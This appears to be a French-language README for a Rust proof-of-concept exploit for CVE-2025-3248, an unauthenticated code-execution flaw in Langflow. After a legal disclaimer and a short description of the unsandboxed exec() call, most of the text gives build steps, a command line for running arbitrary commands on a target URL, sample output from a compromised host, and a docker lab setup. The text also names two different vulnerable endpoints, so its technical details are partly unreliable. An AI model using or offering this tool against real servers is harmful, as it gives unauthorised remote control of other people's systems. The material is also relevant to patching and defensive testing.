
⚠️ Avertissement
Ce code est strictement destiné à des fins éducatives et de recherche uniquement. Toute utilisation non autorisée sur des systèmes sans permission explicite peut constituer une violation de la loi.
L'auteur n'est pas responsable de toute utilisation abusive ou activité malveillante impliquant cet outil.
CVE-2025-3248 - Critique
Score CVSS : 9,8 | Score EPSS : 92,57 % | Publié : 22 mai 2025
Le endpoint /api/v1/validate/code accepte du code Python non assaini et l'exécute directement avec exec(), sans nécessiter d'authentification.
# langflow/api/builder/execute.py
exec(code) # No input validation or sandboxing!
Langflow expose un endpoint /api/v1/builder/execute_code qui prend le code Python fourni par l'utilisateur et le transmet directement à exec() sur le backend. Comme il n'y a ni authentification ni sandboxing, les attaquants peuvent concevoir des charges utiles arbitraires pour exécuter du code.
# Clone repository
git clone <repo-url>
cd CVE-2025-3248-POC
cargo build --release
# ./target/release/CVE-2025-3248-POC
./CVE-2025-3248-POC --url <BASE_URL> --command "<COMMAND>"
❯ ./target/release/CVE-2025-3248-POC --url 'http://192.168.159.137:7860' --command 'id'
[+] Langflow RCE Exploit - CVE-2025-3248
[+] url :http://192.168.159.137:7860,
[+] Command: id
Status: 200 OK
uid=1000(user) gid=0(root) groups=0(root)
> cd lab
> sudo docker-compose up -d
> ./target/release/CVE-2025-3248-POC --url 'http://localhost:7860' --command 'whoami'
> sudo docker-compose down